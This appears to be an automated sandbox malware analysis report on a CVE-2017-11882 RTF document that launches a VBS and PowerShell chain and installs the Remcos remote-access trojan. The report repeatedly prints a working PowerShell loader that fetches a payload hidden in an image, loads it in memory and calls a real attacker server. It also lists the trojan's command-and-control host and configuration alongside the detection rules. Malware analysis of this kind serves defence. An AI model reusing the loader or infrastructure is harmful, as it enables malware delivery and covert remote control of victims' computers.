? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , ProcessId: 3756, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3616, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3800, TargetFilename: C:\Users\user\AppData\Local\Temp\ctbhyd0y.ips.ps1

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 94 80 15 51 D0 65 B6 50 41 75 AB 59 6C D0 B6 DE 5B 82 DC 51 EE D7 CB 4A C6 C2 EC 20 E6 D7 68 F7 DD FB FD 48 BF 92 F0 14 1B 58 2E A1 0B D2 4F C2 CF A7 15 23 D4 B7 0D 25 B5 C3 3E 79 8A 86 82 DC EF E1 D0 57 EB FE 59 19 27 C2 5E A2 22 17 BB D1 ED 85 E0 15 F9 96 05 41 4A 6A 1B C3 A6 8F 2C 65 0E 4F 9C 6E DF F9 12 17 4C C0 2B 26 30 EC 9D 4B FF 38 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 4008, TargetObject: HKEY_CURRENT_USER\Software\Rmc-OT0ZCG\exepath
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-06T11:26:05.269595+020020204231Exploit Kit Activity Detected85.239.241.18480192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-06T11:26:05.269595+020020204251Exploit Kit Activity Detected85.239.241.18480192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-06T11:26:08.593962+020020365941Malware Command and Control Activity Detected192.168.2.224916445.89.247.652201TCP
                  2024-09-06T11:26:10.069561+020020365941Malware Command and Control Activity Detected192.168.2.224916545.89.247.652201TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-06T11:26:04.354590+020020490381A Network Trojan was detected207.241.224.2443192.168.2.2249162TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-06T11:26:09.960512+020028033043Unknown Traffic192.168.2.2249166178.237.33.5080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfAvira: detected
                  Source: dremom2.duckdns.orgAvira URL Cloud: Label: malware
                  Source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: http://geoplugin.net/json.gpVirustotal: Detection: 8%Perma Link
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfVirustotal: Detection: 53%Perma Link
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfReversingLabs: Detection: 47%
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404423 FreeLibrary,CryptUnprotectData,11_2_00404423
                  Source: powershell.exe, 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c3ee1250-a

                  Exploits

                  barindex
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 85.239.241.184 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407538 _wcslen,CoGetObject,8_2_00407538
                  Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
